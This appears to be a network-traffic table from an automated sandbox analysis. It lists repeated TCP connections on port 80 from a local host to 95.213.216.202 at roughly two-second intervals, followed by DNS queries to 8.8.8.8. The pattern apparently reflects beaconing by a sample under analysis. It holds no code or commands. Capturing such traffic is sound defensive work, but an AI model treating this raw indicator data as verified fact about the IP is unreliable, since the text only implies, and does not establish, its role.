Nov 24, 2022 19:55:09.784090996 CET	49727	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:09.788187027 CET	49727	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:09.844860077 CET	80	49727	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:09.844965935 CET	49727	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:09.901648998 CET	80	49727	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:11.470808983 CET	80	49727	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:11.471012115 CET	49727	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:11.471082926 CET	49727	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:11.527808905 CET	80	49727	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:11.719544888 CET	49728	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:11.776662111 CET	80	49728	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:11.776863098 CET	49728	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:11.780323982 CET	49728	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:11.837094069 CET	80	49728	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:11.837272882 CET	49728	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:11.893781900 CET	80	49728	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:13.560422897 CET	80	49728	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:13.560614109 CET	49728	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:13.561012983 CET	49728	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:13.617378950 CET	80	49728	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:13.782181025 CET	49729	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:13.849082947 CET	80	49729	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:13.849315882 CET	49729	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:13.852615118 CET	49729	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:13.920787096 CET	80	49729	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:13.923044920 CET	49729	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:13.989809990 CET	80	49729	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:15.362840891 CET	80	49729	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:15.363018036 CET	49729	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:15.454364061 CET	49729	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:15.511378050 CET	80	49729	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:15.993818998 CET	49730	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:16.051388979 CET	80	49730	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:16.051582098 CET	49730	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:16.067382097 CET	49730	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:16.124243975 CET	80	49730	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:16.124342918 CET	49730	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:16.180980921 CET	80	49730	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:17.735945940 CET	80	49730	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:17.736123085 CET	49730	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:18.752115011 CET	49730	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:18.808902979 CET	80	49730	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:19.098514080 CET	49731	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:19.155339003 CET	80	49731	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:19.155459881 CET	49731	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:19.158566952 CET	49731	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:19.215066910 CET	80	49731	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:19.215342999 CET	49731	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:19.271960974 CET	80	49731	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:20.867898941 CET	80	49731	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:20.868088007 CET	49731	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:20.869369984 CET	49731	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:20.925721884 CET	80	49731	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:21.099296093 CET	49732	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:21.166539907 CET	80	49732	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:21.166685104 CET	49732	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:21.169470072 CET	49732	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:21.236628056 CET	80	49732	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:21.236840963 CET	49732	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:21.304195881 CET	80	49732	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:22.836179018 CET	80	49732	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:22.836318970 CET	49732	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:22.836380959 CET	49732	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:22.903603077 CET	80	49732	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:23.128885984 CET	49733	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:23.193048000 CET	80	49733	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:23.195914984 CET	49733	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:23.201569080 CET	49733	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:23.265805006 CET	80	49733	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:23.265949965 CET	49733	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:23.330027103 CET	80	49733	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:24.906100035 CET	80	49733	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:24.906245947 CET	49733	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:24.906307936 CET	49733	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:24.970448017 CET	80	49733	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:25.121762991 CET	49734	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:25.186075926 CET	80	49734	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:25.186173916 CET	49734	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:25.189583063 CET	49734	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:25.253758907 CET	80	49734	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:25.253937960 CET	49734	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:25.318175077 CET	80	49734	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:26.886960983 CET	80	49734	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:26.889686108 CET	49734	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:26.889741898 CET	49734	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:26.954076052 CET	80	49734	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:27.098373890 CET	49735	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:27.162127018 CET	80	49735	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:27.162434101 CET	49735	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:27.170416117 CET	49735	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:27.234000921 CET	80	49735	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:27.234226942 CET	49735	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:27.297744036 CET	80	49735	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:28.867255926 CET	80	49735	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:28.867419958 CET	49735	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:28.867420912 CET	49735	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:28.931094885 CET	80	49735	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:29.091886997 CET	49736	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:29.157387972 CET	80	49736	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:29.157830954 CET	49736	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:29.163583994 CET	49736	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:29.229331970 CET	80	49736	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:29.231827974 CET	49736	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:29.295528889 CET	80	49736	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:30.902353048 CET	80	49736	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:30.902533054 CET	49736	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:30.902645111 CET	49736	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:30.966079950 CET	80	49736	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:31.133526087 CET	49737	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:31.196630955 CET	80	49737	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:31.196780920 CET	49737	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:31.199873924 CET	49737	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:31.262824059 CET	80	49737	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:31.262911081 CET	49737	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:31.327142000 CET	80	49737	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:32.908190966 CET	80	49737	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:32.910219908 CET	49737	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:32.912136078 CET	49737	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:32.975173950 CET	80	49737	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:33.132678032 CET	49738	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:33.189560890 CET	80	49738	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:33.189775944 CET	49738	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:33.192742109 CET	49738	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:33.252191067 CET	80	49738	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:33.252402067 CET	49738	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:33.309163094 CET	80	49738	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:34.897313118 CET	80	49738	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:34.897418022 CET	49738	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:34.898221016 CET	49738	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:34.957077980 CET	80	49738	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:35.195801020 CET	49739	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:35.256314993 CET	80	49739	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:35.256441116 CET	49739	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:35.259289980 CET	49739	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:35.319724083 CET	80	49739	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:35.319905043 CET	49739	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:35.380667925 CET	80	49739	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:36.924860954 CET	80	49739	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:36.925076008 CET	49739	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:37.394397974 CET	49739	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:37.455313921 CET	80	49739	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:37.694410086 CET	49740	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:37.755460978 CET	80	49740	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:37.756037951 CET	49740	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:37.776320934 CET	49740	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:37.840017080 CET	80	49740	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:37.840137959 CET	49740	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:37.903769970 CET	80	49740	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:39.709470034 CET	80	49740	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:39.709578037 CET	49740	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:39.710020065 CET	49740	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:39.770124912 CET	80	49740	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:39.923321962 CET	49741	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:39.979937077 CET	80	49741	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:39.980230093 CET	49741	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:39.990050077 CET	49741	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:40.046648979 CET	80	49741	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:40.046775103 CET	49741	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:40.103503942 CET	80	49741	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:40.700457096 CET	80	49741	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:40.700611115 CET	49741	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:40.700649977 CET	49741	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:40.757102013 CET	80	49741	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:40.894187927 CET	49742	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:40.951948881 CET	80	49742	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:40.952120066 CET	49742	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:40.973541975 CET	49742	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:41.030246019 CET	80	49742	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:41.034637928 CET	49742	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:41.091214895 CET	80	49742	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:42.590814114 CET	80	49742	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:42.590982914 CET	49742	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:42.591536045 CET	49742	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:42.648880005 CET	80	49742	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:42.802078009 CET	49743	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:42.866080046 CET	80	49743	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:42.866259098 CET	49743	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:42.875605106 CET	49743	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:42.938735008 CET	80	49743	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:42.938832045 CET	49743	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:43.002091885 CET	80	49743	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:44.744519949 CET	80	49743	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:44.744945049 CET	49743	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:44.745003939 CET	49743	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:44.809307098 CET	80	49743	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:44.946585894 CET	49744	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:45.010221004 CET	80	49744	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:45.010464907 CET	49744	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:45.028739929 CET	49744	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:45.092462063 CET	80	49744	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:45.092725039 CET	49744	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:45.156291008 CET	80	49744	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:46.796463013 CET	80	49744	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:46.796664953 CET	49744	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:46.796664953 CET	49744	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:46.860275984 CET	80	49744	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:47.009479046 CET	49745	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:47.076858044 CET	80	49745	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:47.079433918 CET	49745	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:47.082757950 CET	49745	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:47.149897099 CET	80	49745	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:47.150202990 CET	49745	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:47.218303919 CET	80	49745	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:48.824553967 CET	80	49745	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:48.824661016 CET	49745	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:48.831877947 CET	49745	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:48.898847103 CET	80	49745	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:49.009558916 CET	49746	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:49.074732065 CET	80	49746	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:49.074836969 CET	49746	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:49.078874111 CET	49746	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:49.145185947 CET	80	49746	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:49.145370960 CET	49746	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:49.210633039 CET	80	49746	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:50.859980106 CET	80	49746	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:50.860259056 CET	49746	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:50.860259056 CET	49746	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:50.925399065 CET	80	49746	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:51.046344042 CET	49747	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:51.110479116 CET	80	49747	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:51.110860109 CET	49747	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:51.131717920 CET	49747	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:51.195972919 CET	80	49747	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:51.196275949 CET	49747	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:51.261482000 CET	80	49747	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:52.860690117 CET	80	49747	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:52.860846996 CET	49747	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:52.867872000 CET	49747	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:52.931762934 CET	80	49747	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:53.069626093 CET	49748	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:53.126054049 CET	80	49748	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:53.126214027 CET	49748	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:53.130311012 CET	49748	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:53.187758923 CET	80	49748	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:53.190058947 CET	49748	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:53.246783972 CET	80	49748	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:54.888387918 CET	80	49748	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:54.888495922 CET	49748	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:54.888554096 CET	49748	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:54.945060968 CET	80	49748	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:55.069120884 CET	49749	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:55.125516891 CET	80	49749	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:55.125638008 CET	49749	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:55.139214993 CET	49749	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:55.195631981 CET	80	49749	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:55.195702076 CET	49749	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:55.252516985 CET	80	49749	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:57.050677061 CET	80	49749	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:57.050853014 CET	49749	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:57.057257891 CET	49749	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:57.120377064 CET	80	49749	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:57.245290995 CET	49750	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:57.312335968 CET	80	49750	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:57.312514067 CET	49750	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:57.329298019 CET	49750	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:57.396410942 CET	80	49750	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:57.396533012 CET	49750	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:57.463821888 CET	80	49750	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:59.104899883 CET	80	49750	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:59.106528997 CET	49750	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:59.106529951 CET	49750	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:59.173890114 CET	80	49750	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:59.305999041 CET	49751	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:59.362746000 CET	80	49751	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:59.364516020 CET	49751	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:59.376338005 CET	49751	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:59.433072090 CET	80	49751	95.213.216.202	192.168.2.6
Nov 24, 2022 19:55:59.436526060 CET	49751	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:55:59.493936062 CET	80	49751	95.213.216.202	192.168.2.6
Nov 24, 2022 19:56:01.147372961 CET	80	49751	95.213.216.202	192.168.2.6
Nov 24, 2022 19:56:01.147507906 CET	49751	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:01.147599936 CET	49751	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:01.203977108 CET	80	49751	95.213.216.202	192.168.2.6
Nov 24, 2022 19:56:01.375042915 CET	49752	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:01.431845903 CET	80	49752	95.213.216.202	192.168.2.6
Nov 24, 2022 19:56:01.431978941 CET	49752	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:01.434634924 CET	49752	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:01.491415977 CET	80	49752	95.213.216.202	192.168.2.6
Nov 24, 2022 19:56:01.491497040 CET	49752	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:01.548178911 CET	80	49752	95.213.216.202	192.168.2.6
Nov 24, 2022 19:56:03.175717115 CET	80	49752	95.213.216.202	192.168.2.6
Nov 24, 2022 19:56:03.175884962 CET	49752	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:03.175981045 CET	49752	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:03.232578039 CET	80	49752	95.213.216.202	192.168.2.6
Nov 24, 2022 19:56:03.383239031 CET	49753	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:03.440042973 CET	80	49753	95.213.216.202	192.168.2.6
Nov 24, 2022 19:56:03.440300941 CET	49753	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:03.443037987 CET	49753	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:03.499903917 CET	80	49753	95.213.216.202	192.168.2.6
Nov 24, 2022 19:56:03.500075102 CET	49753	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:03.556749105 CET	80	49753	95.213.216.202	192.168.2.6
Nov 24, 2022 19:56:04.545300961 CET	80	49753	95.213.216.202	192.168.2.6
Nov 24, 2022 19:56:04.545376062 CET	49753	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:04.545456886 CET	49753	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:04.602138996 CET	80	49753	95.213.216.202	192.168.2.6
Nov 24, 2022 19:56:04.752279043 CET	49754	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:04.815371990 CET	80	49754	95.213.216.202	192.168.2.6
Nov 24, 2022 19:56:04.815545082 CET	49754	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:04.818902016 CET	49754	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:04.881937981 CET	80	49754	95.213.216.202	192.168.2.6
Nov 24, 2022 19:56:04.882036924 CET	49754	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:04.945152998 CET	80	49754	95.213.216.202	192.168.2.6
Nov 24, 2022 19:56:06.628427029 CET	80	49754	95.213.216.202	192.168.2.6
Nov 24, 2022 19:56:06.628662109 CET	49754	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:06.628662109 CET	49754	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:06.692765951 CET	80	49754	95.213.216.202	192.168.2.6
Nov 24, 2022 19:56:06.821671963 CET	49755	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:06.877995014 CET	80	49755	95.213.216.202	192.168.2.6
Nov 24, 2022 19:56:06.878177881 CET	49755	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:06.881876945 CET	49755	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:06.938270092 CET	80	49755	95.213.216.202	192.168.2.6
Nov 24, 2022 19:56:06.938436031 CET	49755	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:06.994699955 CET	80	49755	95.213.216.202	192.168.2.6
Nov 24, 2022 19:56:08.689068079 CET	80	49755	95.213.216.202	192.168.2.6
Nov 24, 2022 19:56:08.691345930 CET	49755	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:08.697205067 CET	49755	80	192.168.2.6	95.213.216.202
Nov 24, 2022 19:56:08.753859997 CET	80	49755	95.213.216.202	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2022 19:54:11.254499912 CET	53731	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:54:11.273976088 CET	53	53731	8.8.8.8	192.168.2.6
Nov 24, 2022 19:54:13.553924084 CET	57686	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:54:13.892705917 CET	53	57686	8.8.8.8	192.168.2.6
Nov 24, 2022 19:54:15.835585117 CET	64382	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:54:15.854994059 CET	53	64382	8.8.8.8	192.168.2.6
Nov 24, 2022 19:54:18.123294115 CET	53203	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:54:18.140840054 CET	53	53203	8.8.8.8	192.168.2.6
Nov 24, 2022 19:54:21.991089106 CET	53107	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:54:22.012207031 CET	53	53107	8.8.8.8	192.168.2.6
Nov 24, 2022 19:54:24.912578106 CET	64601	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:54:24.931736946 CET	53	64601	8.8.8.8	192.168.2.6
Nov 24, 2022 19:54:27.135931969 CET	49786	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:54:27.153167009 CET	53	49786	8.8.8.8	192.168.2.6
Nov 24, 2022 19:54:28.961972952 CET	58595	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:54:28.979187965 CET	53	58595	8.8.8.8	192.168.2.6
Nov 24, 2022 19:54:31.195563078 CET	56331	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:54:31.213350058 CET	53	56331	8.8.8.8	192.168.2.6
Nov 24, 2022 19:54:33.429765940 CET	50506	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:54:33.448172092 CET	53	50506	8.8.8.8	192.168.2.6
Nov 24, 2022 19:54:35.800638914 CET	49448	53	192.168.2.6	8.8.8.8
Nov 24, 2022 19:54:35.820136070 CET	53	49448	8.8.8.8	192.168.2.6
Nov 24, 2022 19:54:38.013432026 CET	59082	53	192.168.2.6	8.8.8.8
